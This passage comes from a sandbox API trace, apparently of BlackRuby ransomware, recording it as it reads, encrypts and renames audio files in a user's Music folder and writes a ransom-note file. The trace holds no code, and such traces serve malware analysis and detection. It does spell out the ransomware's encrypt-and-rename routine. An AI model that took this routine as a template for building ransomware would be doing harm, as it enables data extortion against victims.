Final=0, dwFlags=0x0, pbData=0x1c4ea7c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c4ea7c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4eaac*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c4eaac*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] CryptDestroyKey (hKey=0x360d20) returned 1 [0060.234] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.234] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.234] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", lpFilePart=0x0) returned 0x27 [0060.234] GetLastError () returned 0x0 [0060.234] SetErrorMode (uMode=0x1) returned 0x0 [0060.234] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3" (normalized: "c:\\users\\eebsym5\\music\\jbeiguye0ia7.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.235] GetLastError () returned 0xb7 [0060.235] GetFileType (hFile=0x184) returned 0x1 [0060.235] SetErrorMode (uMode=0x0) returned 0x1 [0060.236] GetFileType (hFile=0x184) returned 0x1 [0060.237] CloseHandle (hObject=0x184) returned 1 [0060.237] GetLastError () returned 0xb7 [0060.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3", lpFilePart=0x0) returned 0x27 [0060.237] GetLastError () returned 0xb7 [0060.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_iBMXEGtSaGP4Pt1vCJmQrDgCAfxASlczhnn7nkM.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_iBMXEGtSaGP4Pt1vCJmQrDgCAfxASlczhnn7nkM.BlackRuby", lpFilePart=0x0) returned 0x52 [0060.237] GetLastError () returned 0xb7 [0060.237] SetErrorMode (uMode=0x1) returned 0x0 [0060.237] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3" (normalized: "c:\\users\\eebsym5\\music\\jbeiguye0ia7.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7691c60, ftCreationTime.dwHighDateTime=0x1d35093, ftLastAccessTime.dwLowDateTime=0xfadc0270, ftLastAccessTime.dwHighDateTime=0x1d35702, ftLastWriteTime.dwLowDateTime=0x2c19ce40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x7580)) returned 1 [0060.237] GetLastError () returned 0xb7 [0060.237] SetErrorMode (uMode=0x0) returned 0x1 [0060.237] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\JBeIGUyE0iA7.mp3" (normalized: "c:\\users\\eebsym5\\music\\jbeiguye0ia7.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_iBMXEGtSaGP4Pt1vCJmQrDgCAfxASlczhnn7nkM.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_ibmxegtsagp4pt1vcjmqrdgcafxaslczhnn7nkm.blackruby")) returned 1 [0060.237] GetLastError () returned 0xb7 [0060.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.238] GetLastError () returned 0xb7 [0060.238] SetErrorMode (uMode=0x1) returned 0x0 [0060.238] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.238] GetLastError () returned 0x5 [0060.239] SetErrorMode (uMode=0x0) returned 0x1 [0060.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", lpFilePart=0x0) returned 0x1f [0060.239] GetLastError () returned 0x5 [0060.239] SetErrorMode (uMode=0x1) returned 0x0 [0060.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3" (normalized: "c:\\users\\eebsym5\\music\\muzz.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c81be8 | out: lpFileInformation=0x1c81be8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d87cc0, ftCreationTime.dwHighDateTime=0x1d3598b, ftLastAccessTime.dwLowDateTime=0x14e0bb0, ftLastAccessTime.dwHighDateTime=0x1d35a4d, ftLastWriteTime.dwLowDateTime=0x14e0bb0, ftLastWriteTime.dwHighDateTime=0x1d35a4d, nFileSizeHigh=0x0, nFileSizeLow=0x60aa)) returned 1 [0060.239] GetLastError () returned 0x5 [0060.239] SetErrorMode (uMode=0x0) returned 0x1 [0060.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", lpFilePart=0x0) returned 0x1f [0060.239] GetLastError () returned 0x5 [0060.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", lpFilePart=0x0) returned 0x1f [0060.239] GetLastError () returned 0x5 [0060.239] SetErrorMode (uMode=0x1) returned 0x0 [0060.239] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3" (normalized: "c:\\users\\eebsym5\\music\\muzz.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.239] GetLastError () returned 0x0 [0060.239] GetFileType (hFile=0x184) returned 0x1 [0060.239] SetErrorMode (uMode=0x0) returned 0x1 [0060.239] GetFileType (hFile=0x184) returned 0x1 [0060.239] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x60aa [0060.239] GetLastError () returned 0x0 [0060.239] ReadFile (in: hFile=0x184, lpBuffer=0x1c83ad0, nNumberOfBytesToRead=0x60aa, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c83ad0*, lpNumberOfBytesRead=0x18ed84*=0x60aa, lpOverlapped=0x0) returned 1 [0060.240] GetLastError () returned 0x0 [0060.240] CloseHandle (hObject=0x184) returned 1 [0060.240] GetLastError () returned 0x0 [0060.240] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", lpFilePart=0x0) returned 0x1f [0060.240] GetLastError () returned 0x0 [0060.240] SetErrorMode (uMode=0x1) returned 0x0 [0060.240] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3" (normalized: "c:\\users\\eebsym5\\music\\muzz.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d87cc0, ftCreationTime.dwHighDateTime=0x1d3598b, ftLastAccessTime.dwLowDateTime=0x14e0bb0, ftLastAccessTime.dwHighDateTime=0x1d35a4d, ftLastWriteTime.dwLowDateTime=0x14e0bb0, ftLastWriteTime.dwHighDateTime=0x1d35a4d, nFileSizeHigh=0x0, nFileSizeLow=0x60aa)) returned 1 [0060.240] GetLastError () returned 0x0 [0060.240] SetErrorMode (uMode=0x0) returned 0x1 [0060.251] CryptImportKey (in: hProv=0x37c680, pbData=0x1ce9fa4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0060.251] GetLastError () returned 0x0 [0060.251] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.251] GetLastError () returned 0x0 [0060.256] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.256] GetLastError () returned 0x0 [0060.256] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0060.256] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.256] GetLastError () returned 0x0 [0060.256] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1d16ff0*=0x1, dwFlags=0x0) returned 1 [0060.256] GetLastError () returned 0x0 [0060.256] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1d16fbc, dwFlags=0x0) returned 1 [0060.256] GetLastError () returned 0x0 [0060.256] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d17038*, pdwDataLen=0x18ed74*=0x61a0, dwBufLen=0x61a0 | out: pbData=0x1d17038*, pdwDataLen=0x18ed74*=0x61a0) returned 1 [0060.256] GetLastError () returned 0x0 [0060.256] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d233a4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d233a4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.257] GetLastError () returned 0x0 [0060.257] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d233d4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d233d4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.257] GetLastError () returned 0x0 [0060.257] CryptDestroyKey (hKey=0x360ce0) returned 1 [0060.257] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.257] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0060.257] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3", lpFilePart=0x0) returned 0x1f [0060.257] GetLastError () returned 0x0 [0060.257] SetErrorMode (uMode=0x1) returned 0x0 [0060.258] GetFileType (hFile=0x184) returned 0x1 [0060.258] GetFileType (hFile=0x184) returned 0x1 [0060.259] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\MUzZ.mp3" (normalized: "c:\\users\\eebsym5\\music\\muzz.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_V3OkIJTHvt7MrnMgKayfO07oO550J71tsDp3on45gPcbbR.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_v3okijthvt7mrnmgkayfo07oo550j71tsdp3on45gpcbbr.blackruby")) returned 1 [0060.259] GetLastError () returned 0xb7 [0060.260] SetErrorMode (uMode=0x0) returned 0x1 [0060.261] SetErrorMode (uMode=0x0) returned 0x1 [0060.261] GetFileType (hFile=0x184) returned 0x1 [0060.261] GetFileType (hFile=0x184) returned 0x1 [0060.261] ReadFile (in: hFile=0x184, lpBuffer=0x1d724c8, nNumberOfBytesToRead=0x12359, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d724c8*, lpNumberOfBytesRead=0x18ed84*=0x12359, lpOverlapped=0x0) returned 1 [0060.262] GetLastError () returned 0x0 [0060.299] CryptImportKey (in: hProv=0x37c818, pbData=0x1bc2cc8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0060.299] GetLastError () returned 0x0 [0060.299] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.299] GetLastError () returned 0x0 [0060.304] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.304] GetLastError () returned 0x0 [0060.304] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ee0) returned 1 [0060.304] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.304] GetLastError () returned 0x0 [0060.304] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1befd14*=0x1, dwFlags=0x0) returned 1 [0060.304] GetLastError () returned 0x0 [0060.304] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1befce0, dwFlags=0x0) returned 1 [0060.304] GetLastError () returned 0x0 [0060.304] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1befd5c*, pdwDataLen=0x18ed74*=0x12450, dwBufLen=0x12450 | out: pbData=0x1befd5c*, pdwDataLen=0x18ed74*=0x12450) returned 1 [0060.305] GetLastError () returned 0x0 [0060.305] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c14628*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c14628*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.305] GetLastError () returned 0x0 [0060.305] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c14658*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c14658*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.305] GetLastError () returned 0x0 [0060.305] CryptDestroyKey (hKey=0x360a20) returned 1 [0060.305] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.305] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.305] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\qL_PsmIUtQd.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\qL_PsmIUtQd.wav", lpFilePart=0x0) returned 0x26 [0060.305] GetLastError () returned 0x0 [0060.305] SetErrorMode (uMode=0x1) returned 0x0 [0060.307] GetFileType (hFile=0x184) returned 0x1 [0060.307] SetErrorMode (uMode=0x0) returned 0x1 [0060.307] GetFileType (hFile=0x184) returned 0x1 [0060.308] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\qL_PsmIUtQd.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\qL_PsmIUtQd.wav", lpFilePart=0x0) returned 0x26 [0060.308] GetLastError () returned 0xb7 [0060.308] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_uWaWP319SwoffIjydzmf5gLH3yMIOexvFSTS3MZaqzKV.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_uWaWP319SwoffIjydzmf5gLH3yMIOexvFSTS3MZaqzKV.BlackRuby", lpFilePart=0x0) returned 0x57 [0060.308] GetLastError () returned 0xb7 [0060.308] SetErrorMode (uMode=0x1) returned 0x0 [0060.308] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\qL_PsmIUtQd.wav" (normalized: "c:\\users\\eebsym5\\music\\ql_psmiutqd.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc250cbe0, ftCreationTime.dwHighDateTime=0x1d35a43, ftLastAccessTime.dwLowDateTime=0x679d15e0, ftLastAccessTime.dwHighDateTime=0x1d35247, ftLastWriteTime.dwLowDateTime=0x2c2353c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12460)) returned 1 [0060.308] GetLastError () returned 0xb7 [0060.308] SetErrorMode (uMode=0x0) returned 0x1 [0060.309] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\qL_PsmIUtQd.wav" (normalized: "c:\\users\\eebsym5\\music\\ql_psmiutqd.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_uWaWP319SwoffIjydzmf5gLH3yMIOexvFSTS3MZaqzKV.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_uwawp319swoffijydzmf5glh3ymioexvfsts3mzaqzkv.blackruby")) returned 1 [0060.309] GetLastError () returned 0xb7 [0060.309] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.310] GetLastError () returned 0xb7 [0060.310] SetErrorMode (uMode=0x1) returned 0x0 [0060.310] SetErrorMode (uMode=0x0) returned 0x1 [0060.310] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\RFDlq4u1Ri.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\RFDlq4u1Ri.m4a", lpFilePart=0x0) returned 0x25 [0060.310] GetLastError () returned 0x5 [0060.310] SetErrorMode (uMode=0x1) returned 0x0 [0060.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\RFDlq4u1Ri.m4a" (normalized: "c:\\users\\eebsym5\\music\\rfdlq4u1ri.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1c43b94 | out: lpFileInformation=0x1c43b94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf4a440, ftCreationTime.dwHighDateTime=0x1d34f98, ftLastAccessTime.dwLowDateTime=0x1c343b60, ftLastAccessTime.dwHighDateTime=0x1d350ee, ftLastWriteTime.dwLowDateTime=0x1c343b60, ftLastWriteTime.dwHighDateTime=0x1d350ee, nFileSizeHigh=0x0, nFileSizeLow=0x131b7)) returned 1 [0060.311] GetLastError () returned 0x5 [0060.311] SetErrorMode (uMode=0x0) returned 0x1 [0060.311] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.311] GetLastError () returned 0x5 [0060.311] SetErrorMode (uMode=0x1) returned 0x0 [0060.312] SetErrorMode (uMode=0x0) returned 0x1 [0060.312] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", lpFilePart=0x0) returned 0x2b [0060.312] GetLastError () returned 0x5 [0060.312] SetErrorMode (uMode=0x1) returned 0x0 [0060.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3" (normalized: "c:\\users\\eebsym5\\music\\uviqro9k4jkh02m4.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c615c4 | out: lpFileInformation=0x1c615c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77afcb10, ftCreationTime.dwHighDateTime=0x1d34f6f, ftLastAccessTime.dwLowDateTime=0x26f7b270, ftLastAccessTime.dwHighDateTime=0x1d3576f, ftLastWriteTime.dwLowDateTime=0x26f7b270, ftLastWriteTime.dwHighDateTime=0x1d3576f, nFileSizeHigh=0x0, nFileSizeLow=0xef9b)) returned 1 [0060.312] GetLastError () returned 0x5 [0060.312] SetErrorMode (uMode=0x0) returned 0x1 [0060.312] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", lpFilePart=0x0) returned 0x2b [0060.312] GetLastError () returned 0x5 [0060.312] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", lpFilePart=0x0) returned 0x2b [0060.313] GetLastError () returned 0x5 [0060.313] SetErrorMode (uMode=0x1) returned 0x0 [0060.313] GetFileType (hFile=0x184) returned 0x1 [0060.313] SetErrorMode (uMode=0x0) returned 0x1 [0060.313] GetFileType (hFile=0x184) returned 0x1 [0060.313] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xef9b [0060.313] GetLastError () returned 0x0 [0060.313] ReadFile (in: hFile=0x184, lpBuffer=0x1c63308, nNumberOfBytesToRead=0xef9b, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c63308*, lpNumberOfBytesRead=0x18ed84*=0xef9b, lpOverlapped=0x0) returned 1 [0060.314] GetLastError () returned 0x0 [0060.314] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", lpFilePart=0x0) returned 0x2b [0060.314] GetLastError () returned 0x0 [0060.314] SetErrorMode (uMode=0x1) returned 0x0 [0060.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3" (normalized: "c:\\users\\eebsym5\\music\\uviqro9k4jkh02m4.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77afcb10, ftCreationTime.dwHighDateTime=0x1d34f6f, ftLastAccessTime.dwLowDateTime=0x26f7b270, ftLastAccessTime.dwHighDateTime=0x1d3576f, ftLastWriteTime.dwLowDateTime=0x26f7b270, ftLastWriteTime.dwHighDateTime=0x1d3576f, nFileSizeHigh=0x0, nFileSizeLow=0xef9b)) returned 1 [0060.314] GetLastError () returned 0x0 [0060.314] SetErrorMode (uMode=0x0) returned 0x1 [0060.324] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1cdb5f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0060.324] GetLastError () returned 0x0 [0060.324] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.324] GetLastError () returned 0x0 [0060.330] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.330] GetLastError () returned 0x0 [0060.330] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0060.330] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.330] GetLastError () returned 0x0 [0060.330] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1d08644*=0x1, dwFlags=0x0) returned 1 [0060.330] GetLastError () returned 0x0 [0060.330] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1d08610, dwFlags=0x0) returned 1 [0060.330] GetLastError () returned 0x0 [0060.330] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d0868c*, pdwDataLen=0x18ed74*=0xf090, dwBufLen=0xf090 | out: pbData=0x1d0868c*, pdwDataLen=0x18ed74*=0xf090) returned 1 [0060.331] GetLastError () returned 0x0 [0060.331] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d267d8*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d267d8*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.331] GetLastError () returned 0x0 [0060.331] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d26808*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d26808*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.331] GetLastError () returned 0x0 [0060.332] CryptDestroyKey (hKey=0x360d20) returned 1 [0060.332] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.332] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.332] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3", lpFilePart=0x0) returned 0x2b [0060.332] GetLastError () returned 0x0 [0060.332] SetErrorMode (uMode=0x1) returned 0x0 [0060.333] GetFileType (hFile=0x184) returned 0x1 [0060.333] GetFileType (hFile=0x184) returned 0x1 [0060.335] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\UViQro9K4JKH02M4.mp3" (normalized: "c:\\users\\eebsym5\\music\\uviqro9k4jkh02m4.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_hNckT7awmZVy8C6jlGzubdltHNUHF1LpQrVO5Q.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_hnckt7awmzvy8c6jlgzubdlthnuhf1lpqrvo5q.blackruby")) returned 1 [0060.335] GetLastError () returned 0xb7 [0060.336] SetErrorMode (uMode=0x0) returned 0x1 [0060.337] GetFileType (hFile=0x184) returned 0x1 [0060.337] GetFileType (hFile=0x184) returned 0x1 [0060.337] ReadFile (in: hFile=0x184, lpBuffer=0x2e311f0, nNumberOfBytesToRead=0x18ded, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2e311f0*, lpNumberOfBytesRead=0x18ed84*=0x18ded, lpOverlapped=0x0) returned 1 [0060.338] GetLastError () returned 0x0 [0060.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav", lpFilePart=0x0) returned 0x24 [0060.356] GetLastError () returned 0x0 [0060.356] SetErrorMode (uMode=0x1) returned 0x0 [0060.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav" (normalized: "c:\\users\\eebsym5\\music\\vghzj1hrs.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bce8a0, ftCreationTime.dwHighDateTime=0x1d3554a, ftLastAccessTime.dwLowDateTime=0x3c26c990, ftLastAccessTime.dwHighDateTime=0x1d34de9, ftLastWriteTime.dwLowDateTime=0x3c26c990, ftLastWriteTime.dwHighDateTime=0x1d34de9, nFileSizeHigh=0x0, nFileSizeLow=0x18ded)) returned 1 [0060.356] GetLastError () returned 0x0 [0060.356] SetErrorMode (uMode=0x0) returned 0x1 [0060.356] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced 